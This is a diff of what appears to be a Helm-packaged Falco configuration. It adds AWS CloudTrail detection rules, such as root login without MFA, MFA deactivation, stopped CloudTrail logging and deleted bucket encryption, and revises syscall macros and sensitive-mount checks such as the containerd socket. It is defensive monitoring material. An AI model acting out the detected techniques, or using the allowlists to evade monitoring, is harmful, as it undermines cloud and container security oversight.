+  falco.yaml: "# File(s) or Directories containing Falco rules, loaded at startup.\n# The name \"rules_file\" is only for backwards compatibility.\n# If the entry is a file, it will be read directly. If the entry is a directory,\n# every file in that directory will be read, in alphabetical order.\n#\n# falco_rules.yaml ships with the falco package and is overridden with\n# every new software version. falco_rules.local.yaml is only created\n# if it doesn't exist. If you want to customize the set of rules, add\n# your customizations to falco_rules.local.yaml.\n#\n# The files will be read in the order presented here, so make sure if\n# you have overrides they appear in later files.\nrules_file:\n  - /etc/falco/falco_rules.yaml\n  - /etc/falco/falco_rules.local.yaml\n  - /etc/falco/k8s_audit_rules.yaml\n  - /etc/falco/rules.d\n\nplugins:\n    - init_config: \"\"\n      library_path: libcloudtrail.so\n      name: cloudtrail\n      open_params: \"\"\n    - init_config: \"\"\n      library_path: libjson.so\n      name: json\n\n# Setting this list to empty ensures that the above plugins are *not*\n# loaded and enabled by default. If you want to use the above plugins,\n# set a meaningful init_config/open_params for the cloudtrail plugin\n# and then change this to:\n# load_plugins: [cloudtrail, json]\nload_plugins:\n    []\n\n# If true, the times displayed in log messages and output messages\n# will be in ISO 8601. By default, times are displayed in the local\n# time zone, as governed by /etc/localtime.\ntime_format_iso_8601: false\n\n# Whether to output events in json or text\njson_output: true\n\n# When using json output, whether or not to include the \"output\" property\n# itself (e.g. \"File below a known binary directory opened for writing\n# (user=root ....\") in the json output.\njson_include_output_property: true\n\n# When using json output, whether or not to include the \"tags\" property\n# itself in the json output. 
If set to true, outputs caused by rules\n# with no tags will have a \"tags\" field set to an empty array. If set to\n# false, the \"tags\" field will not be included in the json output at all.\njson_include_tags_property: true\n\n# Send information logs to stderr and/or syslog Note these are *not* security\n# notification logs! These are just Falco lifecycle (and possibly error) logs.\nlog_stderr: true\nlog_syslog: true\n\n# Minimum log level to include in logs. Note: these levels are\n# separate from the priority field of rules. This refers only to the\n# log level of falco's internal logging. Can be one of \"emergency\",\n# \"alert\", \"critical\", \"error\", \"warning\", \"notice\", \"info\", \"debug\".\nlog_level: info\n\n# Minimum rule priority level to load and run. All rules having a\n# priority more severe than this level will be loaded/run.  Can be one\n# of \"emergency\", \"alert\", \"critical\", \"error\", \"warning\", \"notice\",\n# \"info\", \"debug\".\npriority: debug\n\n# Whether or not output to any of the output channels below is\n# buffered. Defaults to false\nbuffered_outputs: false\n\n# Falco uses a shared buffer between the kernel and userspace to pass\n# system call information. When Falco detects that this buffer is\n# full and system calls have been dropped, it can take one or more of\n# the following actions:\n#   - ignore: do nothing (default when list of actions is empty)\n#   - log: log a DEBUG message noting that the buffer was full\n#   - alert: emit a Falco alert noting that the buffer was full\n#   - exit: exit Falco with a non-zero rc\n#\n# Notice it is not possible to ignore and log/alert messages at the same time.\n#\n# The rate at which log/alert messages are emitted is governed by a\n# token bucket. 
The rate corresponds to one message every 30 seconds\n# with a burst of one message (by default).\n#\n# The messages are emitted when the percentage of dropped system calls\n# with respect the number of events in the last second\n# is greater than the given threshold (a double in the range [0, 1]).\n#\n# For debugging/testing it is possible to simulate the drops using\n# the `simulate_drops: true`. In this case the threshold does not apply.\nsyscall_event_drops:\n  threshold: 0.1\n  actions:\n    - log\n    - alert\n  rate: 0.03333\n  max_burst: 1\n\n# Falco uses a shared buffer between the kernel and userspace to receive\n# the events (eg., system call information) in userspace.\n#\n# Anyways, the underlying libraries can also timeout for various reasons.\n# For example, there could have been issues while reading an event.\n# Or the particular event needs to be skipped.\n# Normally, it's very unlikely that Falco does not receive events consecutively.\n#\n# Falco is able to detect such uncommon situation.\n#\n# Here you can configure the maximum number of consecutive timeouts without an event\n# after which you want Falco to alert.\n# By default this value is set to 1000 consecutive timeouts without an event at all.\n# How this value maps to a time interval depends on the CPU frequency.\nsyscall_event_timeouts:\n  max_consecutives: 1000\n\n# Falco continuously monitors outputs performance. 
When an output channel does not allow\n# to deliver an alert within a given deadline, an error is reported indicating\n# which output is blocking notifications.\n# The timeout error will be reported to the log according to the above log_* settings.\n# Note that the notification will not be discarded from the output queue; thus,\n# output channels may indefinitely remain blocked.\n# An output timeout error indeed indicate a misconfiguration issue or I/O problems\n# that cannot be recovered by Falco and should be fixed by the user.\n#\n# The \"output_timeout\" value specifies the duration in milliseconds to wait before\n# considering the deadline exceed.\n#\n# With a 2000ms default, the notification consumer can block the Falco output\n# for up to 2 seconds without reaching the timeout.\noutput_timeout: 2000\n\n# A throttling mechanism implemented as a token bucket limits the\n# rate of falco notifications. This throttling is controlled by the following configuration\n# options:\n#  - rate: the number of tokens (i.e. right to send a notification)\n#    gained per second. Defaults to 1.\n#  - max_burst: the maximum number of tokens outstanding. Defaults to 1000.\n#\n# With these defaults, falco could send up to 1000 notifications after\n# an initial quiet period, and then up to 1 notification per second\n# afterward. It would gain the full burst back after 1000 seconds of\n# no activity.\noutputs:\n  rate: 1\n  max_burst: 1000\n\n# Where security notifications should go.\n# Multiple outputs can be enabled.\nsyslog_output:\n  enabled: true\n\n# If keep_alive is set to true, the file will be opened once and\n# continuously written to, with each output message on its own\n# line. 
If keep_alive is set to false, the file will be re-opened\n# for each output message.\n#\n# Also, the file will be closed and reopened if falco is signaled with\n# SIGUSR1.\nfile_output:\n  enabled: false\n  keep_alive: false\n  filename: ./events.txt\n\nstdout_output:\n  enabled: true\n\n# Falco contains an embedded webserver that can be used to accept K8s\n# Audit Events. These config options control the behavior of that\n# webserver. (By default, the webserver is disabled).\n#\n# The ssl_certificate is a combination SSL Certificate and corresponding\n# key contained in a single file. You can generate a key/cert as follows:\n#\n# $ openssl req -newkey rsa:2048 -nodes -keyout key.pem -x509 -days 365 -out certificate.pem\n# $ cat certificate.pem key.pem > falco.pem\n# $ sudo cp falco.pem /etc/falco/falco.pem\nwebserver:\n  enabled: true\n  listen_port: 8765\n  k8s_audit_endpoint: /k8s-audit\n  k8s_healthz_endpoint: /healthz\n  ssl_enabled: false\n  ssl_certificate: /etc/falco/certs/server.pem\n\n# If keep_alive is set to true, the program will be started once and\n# continuously written to, with each output message on its own\n# line. If keep_alive is set to false, the program will be re-spawned\n# for each output message.\n#\n# Also, the program will be closed and reopened if falco is signaled with\n# SIGUSR1.\nprogram_output:\n  enabled: false\n  keep_alive: false\n  program: |\n    mail -s \"Falco Notification\" someone@example.com\n\nhttp_output:\n  enabled: true\n  url: 'http://falco-sidekick-falcosidekick:2801'\n  user_agent: falcosecurity/falco\n\n\n# Falco supports running a gRPC server with two main binding types\n# 1. Over the network with mandatory mutual TLS authentication (mTLS)\n# 2. 
Over a local unix socket with no authentication\n# By default, the gRPC server is disabled, with no enabled services (see grpc_output)\n# please comment/uncomment and change accordingly the options below to configure it.\n# Important note: if Falco has any troubles creating the gRPC server\n# this information will be logged, however the main Falco daemon will not be stopped.\n# gRPC server over network with (mandatory) mutual TLS configuration.\n# This gRPC server is secure by default so you need to generate certificates and update their paths here.\n# By default the gRPC server is off.\n# You can configure the address to bind and expose it.\n# By modifying the threadiness configuration you can fine-tune the number of threads (and context) it will use.\n# grpc:\n#   enabled: true\n#   bind_address: \"0.0.0.0:5060\"\n#   # when threadiness is 0, Falco sets it by automatically figuring out the number of online cores\n#   threadiness: 0\n#   private_key: \"/etc/falco/certs/server.key\"\n#   cert_chain: \"/etc/falco/certs/server.crt\"\n#   root_certs: \"/etc/falco/certs/ca.crt\"\ngrpc:\n  enabled: true\n  threadiness: 0\n  bind_address: \"unix:///var/run/falco/falco.sock\"\n  \n\n# gRPC output service.\n# By default it is off.\n# By enabling this all the output events will be kept in memory until you read them with a gRPC client.\n# Make sure to have a consumer for them or leave this disabled.\ngrpc_output:\n  enabled: true\n\n# Container orchestrator metadata fetching params\nmetadata_download:\n  max_mb: 100\n  chunk_wait_us: 1000\n  watch_freq_sec: 1"
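The `syscall_event_drops` and `outputs` sections in the config above both throttle messages with the token-bucket scheme their inline comments describe (tokens regained at `rate` per second, at most `max_burst` outstanding). A minimal sketch of that mechanism — not Falco's actual implementation, just the arithmetic the comments imply:

```python
class TokenBucket:
    """Token bucket as described in the falco.yaml comments:
    `rate` tokens gained per second, at most `max_burst` outstanding."""

    def __init__(self, rate, max_burst, now=0.0):
        self.rate = rate
        self.max_burst = max_burst
        self.tokens = float(max_burst)  # start full, so an initial burst is allowed
        self.last = now

    def claim(self, now):
        """Claim one token; return True if a message may be emitted at time `now`."""
        self.tokens = min(self.max_burst, self.tokens + (now - self.last) * self.rate)
        self.last = now
        if self.tokens >= 1.0:
            self.tokens -= 1.0
            return True
        return False

# outputs: rate=1, max_burst=1000 -> up to 1000 alerts at once, then 1/second.
# syscall_event_drops: rate=0.03333, max_burst=1 -> one drop message per ~30 s:
drops = TokenBucket(rate=0.03333, max_burst=1)
print(drops.claim(0.0))   # True  - the single burst token
print(drops.claim(1.0))   # False - only ~0.03 tokens regained
print(drops.claim(31.0))  # True  - a full token after ~30 s
```

This also shows why the chart's change from `max_burst: 10` to `max_burst: 1` matters: after a quiet period the old config could emit ten drop messages back-to-back, the new one only a single message every ~30 seconds.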
   application_rules.yaml: |-
     #
     # Copyright (C) 2019 The Falco Authors.
@@ -343,7 +343,449 @@
     #   condition: proc.name in (http_server_binaries) and inbound and fd.sport != 80 and fd.sport != 443
     #   output: "Inbound network traffic to HTTP Server on unexpected port (connection=%fd.name)"
     #   priority: WARNING
-  falco_rules.local.yaml: |
+  aws_cloudtrail_rules.yaml: |
+    #
+    # Copyright (C) 2022 The Falco Authors.
+    #
+    #
+    # Licensed under the Apache License, Version 2.0 (the "License");
+    # you may not use this file except in compliance with the License.
+    # You may obtain a copy of the License at
+    #
+    #     http://www.apache.org/licenses/LICENSE-2.0
+    #
+    # Unless required by applicable law or agreed to in writing, software
+    # distributed under the License is distributed on an "AS IS" BASIS,
+    # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+    # See the License for the specific language governing permissions and
+    # limitations under the License.
+    #
+
+    # All rules files related to plugins should require engine version 10
+    - required_engine_version: 10
+
+    # These rules can be read by cloudtrail plugin version 0.1.0, or
+    # anything semver-compatible.
+    - required_plugin_versions:
+      - name: cloudtrail
+        version: 0.2.3
+      - name: json
+        version: 0.2.2
+
+    # Note that this rule is disabled by default. It's useful only to
+    # verify that the cloudtrail plugin is sending events properly.  The
+    # very broad condition evt.num > 0 only works because the rule source
+    # is limited to aws_cloudtrail. This ensures that the only events that
+    # are matched against the rule are from the cloudtrail plugin (or
+    # a different plugin with the same source).
+    - rule: All Cloudtrail Events
+      desc: Match all cloudtrail events.
+      condition:
+        evt.num > 0
+      output: Some Cloudtrail Event (evtnum=%evt.num info=%evt.plugininfo ts=%evt.time.iso8601 id=%ct.id error=%ct.error)
+      priority: DEBUG
+      tags:
+      - cloud
+      - aws
+      source: aws_cloudtrail
+      enabled: false
+
+    - rule: Console Login Through Assume Role
+      desc: Detect a console login through Assume Role.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and ct.user.identitytype="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+      output:
+        Detected a console login through Assume Role
+        (principal=%ct.user.principalid,
+        assumedRole=%ct.user.arn,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region)
+      priority: WARNING
+      tags:
+      - cloud
+      - aws
+      - aws_console
+      - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Console Login Without MFA
+      desc: Detect a console login without MFA.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and ct.user.identitytype!="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+        and json.value[/additionalEventData/MFAUsed]="No"
+      output:
+        Detected a console login without MFA
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_console
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Console Root Login Without MFA
+      desc: Detect root console login without MFA.
+      condition:
+        ct.name="ConsoleLogin" and not ct.error exists
+        and json.value[/additionalEventData/MFAUsed]="No"
+        and ct.user.identitytype!="AssumedRole"
+        and json.value[/responseElements/ConsoleLogin]="Success"
+        and ct.user.identitytype="Root"
+      output:
+        Detected a root console login without MFA.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_console
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Deactivate MFA for Root User
+      desc: Detect deactivating MFA configuration for root.
+      condition:
+        ct.name="DeactivateMFADevice" and not ct.error exists
+        and ct.user.identitytype="Root"
+        and ct.request.username="AWS ROOT USER"
+      output:
+        Multi Factor Authentication configuration has been disabled for root
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         MFA serial number=%ct.request.serialnumber)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Create AWS user
+      desc: Detect creation of a new AWS user.
+      condition:
+        ct.name="CreateUser" and not ct.error exists
+      output:
+        A new AWS user has been created
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         new user created=%ct.request.username)
+      priority: INFO
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Create Group
+      desc: Detect creation of a new user group.
+      condition:
+        ct.name="CreateGroup" and not ct.error exists
+      output:
+        A new user group has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         group name=%ct.request.groupname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: Delete Group
+      desc: Detect deletion of a user group.
+      condition:
+        ct.name="DeleteGroup" and not ct.error exists
+      output:
+        A user group has been deleted.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         group name=%ct.request.groupname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_iam
+      source: aws_cloudtrail
+
+    - rule: ECS Service Created
+      desc: Detect a new service is created in ECS.
+      condition:
+        ct.src="ecs.amazonaws.com" and
+        ct.name="CreateService" and
+        not ct.error exists
+      output:
+        A new service has been created in ECS
+        (requesting user=%ct.user,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region,
+        cluster=%ct.request.cluster,
+        service name=%ct.request.servicename,
+        task definition=%ct.request.taskdefinition)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ecs
+        - aws_fargate
+      source: aws_cloudtrail
+
+    - rule: ECS Task Run or Started
+      desc: Detect a new task is started in ECS.
+      condition:
+        ct.src="ecs.amazonaws.com" and
+        (ct.name="RunTask" or ct.name="StartTask") and
+        not ct.error exists
+      output:
+        A new task has been started in ECS
+        (requesting user=%ct.user,
+        requesting IP=%ct.srcip,
+        AWS region=%ct.region,
+        cluster=%ct.request.cluster,
+        task definition=%ct.request.taskdefinition)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ecs
+        - aws_fargate
+      source: aws_cloudtrail
+
+    - rule: Create Lambda Function
+      desc: Detect creation of a Lambda function.
+      condition:
+        ct.name="CreateFunction20150331" and not ct.error exists
+      output:
+        Lambda function has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Update Lambda Function Code
+      desc: Detect updates to a Lambda function code.
+      condition:
+        ct.name="UpdateFunctionCode20150331v2" and not ct.error exists
+      output:
+        The code of a Lambda function has been updated.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Update Lambda Function Configuration
+      desc: Detect updates to a Lambda function configuration.
+      condition:
+        ct.name="UpdateFunctionConfiguration20150331v2" and not ct.error exists
+      output:
+        The configuration of a Lambda function has been updated.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         lambda function=%ct.request.functionname)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_lambda
+      source: aws_cloudtrail
+
+    - rule: Run Instances
+      desc: Detect launching of a specified number of instances.
+      condition:
+        ct.name="RunInstances" and not ct.error exists
+      output:
+        A number of instances have been launched.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         availability zone=%ct.request.availabilityzone,
+         subnet id=%ct.response.subnetid,
+         reservation id=%ct.response.reservationid)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ec2
+      source: aws_cloudtrail
+
+    # Only instances launched on regions in this list are approved.
+    - list: approved_regions
+      items:
+        - us-east-0
+
+    - rule: Run Instances in Non-approved Region
+      desc: Detect launching of a specified number of instances in a non-approved region.
+      condition:
+        ct.name="RunInstances" and not ct.error exists and
+        not ct.region in (approved_regions)
+      output:
+        A number of instances have been launched in a non-approved region.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         availability zone=%ct.request.availabilityzone,
+         subnet id=%ct.response.subnetid,
+         reservation id=%ct.response.reservationid,
+         image id=%json.value[/responseElements/instancesSet/items/0/instanceId])
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_ec2
+      source: aws_cloudtrail
+
+    - rule: Delete Bucket Encryption
+      desc: Detect deleting configuration to use encryption for bucket storage.
+      condition:
+        ct.name="DeleteBucketEncryption" and not ct.error exists
+      output:
+        A encryption configuration for a bucket has been deleted
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket=%s3.bucket)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Delete Bucket Public Access Block
+      desc: Detect deleting blocking public access to bucket.
+      condition:
+        ct.name="PutBucketPublicAccessBlock" and not ct.error exists and
+        json.value[/requestParameters/publicAccessBlock]="" and
+          (json.value[/requestParameters/PublicAccessBlockConfiguration/RestrictPublicBuckets]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/BlockPublicPolicy]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/BlockPublicAcls]=false or
+          json.value[/requestParameters/PublicAccessBlockConfiguration/IgnorePublicAcls]=false)
+      output:
+        A public access block for a bucket has been deleted
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket=%s3.bucket)
+      priority: CRITICAL
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: List Buckets
+      desc: Detect listing of all S3 buckets.
+      condition:
+        ct.name="ListBuckets" and not ct.error exists
+      output:
+        A list of all S3 buckets has been requested.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         host=%ct.request.host)
+      priority: WARNING
+      enabled: false
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Put Bucket ACL
+      desc: Detect setting the permissions on an existing bucket using access control lists.
+      condition:
+        ct.name="PutBucketAcl" and not ct.error exists
+      output:
+        The permissions on an existing bucket have been set using access control lists.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket name=%s3.bucket)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: Put Bucket Policy
+      desc: Detect applying an Amazon S3 bucket policy to an Amazon S3 bucket.
+      condition:
+        ct.name="PutBucketPolicy" and not ct.error exists
+      output:
+        An Amazon S3 bucket policy has been applied to an Amazon S3 bucket.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         bucket name=%s3.bucket,
+         policy=%ct.request.policy)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_s3
+      source: aws_cloudtrail
+
+    - rule: CloudTrail Trail Created
+      desc: Detect creation of a new trail.
+      condition:
+        ct.name="CreateTrail" and not ct.error exists
+      output:
+        A new trail has been created.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         trail name=%ct.request.name)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_cloudtrail
+      source: aws_cloudtrail
+
+    - rule: CloudTrail Logging Disabled
+      desc: The CloudTrail logging has been disabled, this could be potentially malicious.
+      condition:
+        ct.name="StopLogging" and not ct.error exists
+      output:
+        The CloudTrail logging has been disabled.
+        (requesting user=%ct.user,
+         requesting IP=%ct.srcip,
+         AWS region=%ct.region,
+         resource name=%ct.request.name)
+      priority: WARNING
+      tags:
+        - cloud
+        - aws
+        - aws_cloudtrail
+      source: aws_cloudtrail
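The `required_plugin_versions` block at the top of the new rules file states that the rules can be read by the named plugin version "or anything semver-compatible". A sketch of that check, under the assumption that semver-compatible here means same major version and not older than the required version (hypothetical helper names, not the plugin framework's API):

```python
def parse(version):
    """Split a 'major.minor.patch' string into a comparable tuple of ints."""
    return tuple(int(part) for part in version.split("."))

def compatible(required, loaded):
    """Semver-style check: same major version, and the loaded plugin is
    at least as new as the required version (minor/patch may be higher)."""
    r, l = parse(required), parse(loaded)
    return l[0] == r[0] and l >= r

print(compatible("0.2.3", "0.2.3"))  # True  - exact match
print(compatible("0.2.3", "0.3.0"))  # True  - newer minor, same major
print(compatible("0.2.3", "1.0.0"))  # False - major version changed
print(compatible("0.2.3", "0.2.1"))  # False - older than required
```

So a cluster running cloudtrail plugin 0.2.x (x ≥ 3) or 0.3.x would load these rules, while a 1.x plugin would not.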
+  falco_rules.local.yaml: |-
     #
     # Copyright (C) 2019 The Falco Authors.
     #
@@ -374,9 +816,9 @@
     #   tags: [users, container]
 
     # Or override/append to any rule, macro, or list from the Default Rules
-  falco_rules.yaml: |
+  falco_rules.yaml: |-
     #
-    # Copyright (C) 2020 The Falco Authors.
+    # Copyright (C) 2022 The Falco Authors.
     #
     #
     # Licensed under the Apache License, Version 2.0 (the "License");
@@ -406,13 +848,13 @@
     #   condition: (syscall.type=read and evt.dir=> and fd.type in (file, directory))
 
     - macro: open_write
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_write=true and fd.typechar='f' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_write=true and fd.typechar='f' and fd.num>=0
 
     - macro: open_read
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='f' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_read=true and fd.typechar='f' and fd.num>=0
 
     - macro: open_directory
-      condition: (evt.type=open or evt.type=openat) and evt.is_open_read=true and fd.typechar='d' and fd.num>=0
+      condition: evt.type in (open,openat,openat2) and evt.is_open_read=true and fd.typechar='d' and fd.num>=0
 
     - macro: never_true
       condition: (evt.num=0)
@@ -440,11 +882,14 @@
       condition: rename or remove
 
     - macro: spawned_process
-      condition: evt.type = execve and evt.dir=<
+      condition: evt.type in (execve, execveat) and evt.dir=<
 
     - macro: create_symlink
       condition: evt.type in (symlink, symlinkat) and evt.dir=<
 
+    - macro: create_hardlink
+      condition: evt.type in (link, linkat) and evt.dir=<
+
     - macro: chmod
       condition: (evt.type in (chmod, fchmod, fchmodat) and evt.dir=<)
 
@@ -593,13 +1038,13 @@
     - list: deb_binaries
       items: [dpkg, dpkg-preconfigu, dpkg-reconfigur, dpkg-divert, apt, apt-get, aptitude,
         frontend, preinst, add-apt-reposit, apt-auto-remova, apt-key,
-        apt-listchanges, unattended-upgr, apt-add-reposit, apt-config, apt-cache, apt.systemd.dai
+        apt-listchanges, unattended-upgr, apt-add-reposit, apt-cache, apt.systemd.dai
         ]
 
     # The truncated dpkg-preconfigu is intentional, process names are
-    # truncated at the sysdig level.
+    # truncated at the falcosecurity-libs level.
     - list: package_mgmt_binaries
-      items: [rpm_binaries, deb_binaries, update-alternat, gem, pip, pip3, sane-utils.post, alternatives, chef-client, apk, snapd]
+      items: [rpm_binaries, deb_binaries, update-alternat, gem, npm, pip, pip3, sane-utils.post, alternatives, chef-client, apk, snapd]
 
     - macro: package_mgmt_procs
       condition: proc.name in (package_mgmt_binaries)
@@ -710,7 +1155,7 @@
     # for efficiency.
     - macro: inbound_outbound
       condition: >
-        ((((evt.type in (accept,listen,connect) and evt.dir=<)) or
+        ((((evt.type in (accept,listen,connect) and evt.dir=<)) and
          (fd.typechar = 4 or fd.typechar = 6)) and
          (fd.ip != "0.0.0.0" and fd.net != "127.0.0.0/8") and
          (evt.rawres >= 0 or evt.res = EINPROGRESS))
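The hunk above swaps the top-level `or` for `and` in the `inbound_outbound` macro, so an event must both be a completed network syscall and refer to an IPv4/IPv6 fd. A minimal Python sketch of that boolean structure (illustrative only, not Falco's engine; the event is modeled as a plain dict with simplified field names):

```python
# Hypothetical model of the inbound_outbound macro's boolean structure,
# showing why joining the first two clauses with "and" narrows the match.
def inbound_outbound(evt, joiner="and"):
    is_net_syscall = evt["type"] in ("accept", "listen", "connect") and evt["dir"] == "<"
    is_inet_fd = evt["fd_typechar"] in ("4", "6")   # IPv4 / IPv6 sockets
    not_local = evt["fd_ip"] != "0.0.0.0" and not evt["fd_net"].startswith("127.")
    ok_result = evt["rawres"] >= 0 or evt["res"] == "EINPROGRESS"
    first = (is_net_syscall and is_inet_fd) if joiner == "and" else (is_net_syscall or is_inet_fd)
    return first and not_local and ok_result

# A read on an IPv4 fd is not accept/listen/connect; with "or" it still
# satisfied the first clause, with "and" it no longer does.
evt = {"type": "read", "dir": ">", "fd_typechar": "4",
       "fd_ip": "10.0.0.5", "fd_net": "10.0.0.0/8", "rawres": 0, "res": "OK"}
print(inbound_outbound(evt, joiner="or"))   # True  (over-broad)
print(inbound_outbound(evt, joiner="and"))  # False (tightened)
```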
@@ -938,7 +1383,7 @@
 
     # Qualys seems to run a variety of shell subprocesses, at various
     # levels. This checks at a few levels without the cost of a full
-    # proc.aname, which traverses the full parent heirarchy.
+    # proc.aname, which traverses the full parent hierarchy.
     - macro: run_by_qualys
       condition: >
         (proc.pname=qualys-cloud-ag or
@@ -1149,6 +1594,9 @@
     - macro: centrify_writing_krb
       condition: (proc.name in (adjoin,addns) and fd.name startswith /etc/krb5)
 
+    - macro: sssd_writing_krb
+      condition: (proc.name=adcli and proc.aname[2]=sssd and fd.name startswith /etc/krb5)
+
     - macro: cockpit_writing_conf
       condition: >
         ((proc.pname=cockpit-kube-la or proc.aname[2]=cockpit-kube-la)
@@ -1477,7 +1925,7 @@
       condition: (proc.name=oc and fd.name startswith /etc/origin/node)
 
     - macro: keepalived_writing_conf
-      condition: (proc.name=keepalived and fd.name=/etc/keepalived/keepalived.conf)
+      condition: (proc.name in (keepalived, kube-keepalived) and fd.name=/etc/keepalived/keepalived.conf)
 
     - macro: etcd_manager_updating_dns
       condition: (container and proc.name=etcd-manager and fd.name=/etc/hosts)
@@ -1592,6 +2040,7 @@
         and not nginx_writing_certs
         and not chef_client_writing_conf
         and not centrify_writing_krb
+        and not sssd_writing_krb
         and not cockpit_writing_conf
         and not ipsec_writing_conf
         and not httpd_writing_ssl_conf
@@ -2203,6 +2652,7 @@
         k8s.gcr.io/ip-masq-agent-amd64,
         k8s.gcr.io/kube-proxy,
         k8s.gcr.io/prometheus-to-sd,
+        public.ecr.aws/falcosecurity/falco,
         quay.io/calico/node,
         sysdig/sysdig,
         sematext_images
@@ -2231,7 +2681,7 @@
     - list: falco_sensitive_mount_images
       items: [
         docker.io/sysdig/sysdig, sysdig/sysdig,
-        docker.io/falcosecurity/falco, falcosecurity/falco,
+        docker.io/falcosecurity/falco, falcosecurity/falco, public.ecr.aws/falcosecurity/falco,
         gcr.io/google_containers/hyperkube,
         gcr.io/google_containers/kube-proxy, docker.io/calico/node,
         docker.io/rook/toolbox, docker.io/cloudnativelabs/kube-router, docker.io/consul,
@@ -2247,19 +2697,6 @@
                   container.image.repository in (falco_sensitive_mount_images) or
                   container.image.repository startswith quay.io/sysdig/)
 
-    # These container images are allowed to run with hostnetwork=true
-    - list: falco_hostnetwork_images
-      items: [
-        gcr.io/google-containers/prometheus-to-sd,
-        gcr.io/projectcalico-org/typha,
-        gcr.io/projectcalico-org/node,
-        gke.gcr.io/gke-metadata-server,
-        gke.gcr.io/kube-proxy,
-        gke.gcr.io/netd-amd64,
-        k8s.gcr.io/ip-masq-agent-amd64
-        k8s.gcr.io/prometheus-to-sd,
-        ]
-
     # Add conditions to this macro (probably in a separate file,
     # overwriting this macro) to specify additional containers that are
     # allowed to perform sensitive mounts.
@@ -2282,12 +2719,13 @@
 
     # For now, only considering a full mount of /etc as
     # sensitive. Ideally, this would also consider all subdirectories
-    # below /etc as well, but the globbing mechanism used by sysdig
+    # below /etc as well, but the globbing mechanism
     # doesn't allow exclusions of a full pattern, only single characters.
     - macro: sensitive_mount
       condition: (container.mount.dest[/proc*] != "N/A" or
                   container.mount.dest[/var/run/docker.sock] != "N/A" or
                   container.mount.dest[/var/run/crio/crio.sock] != "N/A" or
+                  container.mount.dest[/run/containerd/containerd.sock] != "N/A" or
                   container.mount.dest[/var/lib/kubelet] != "N/A" or
                   container.mount.dest[/var/lib/kubelet/pki] != "N/A" or
                   container.mount.dest[/] != "N/A" or
@@ -2574,7 +3012,7 @@
     #   output: "sshd sent error message to syslog (error=%evt.buffer)"
     #   priority: WARNING
 
-    - macro: somebody_becoming_themself
+    - macro: somebody_becoming_themselves
       condition: ((user.name=nobody and evt.arg.uid=nobody) or
                   (user.name=www-data and evt.arg.uid=www-data) or
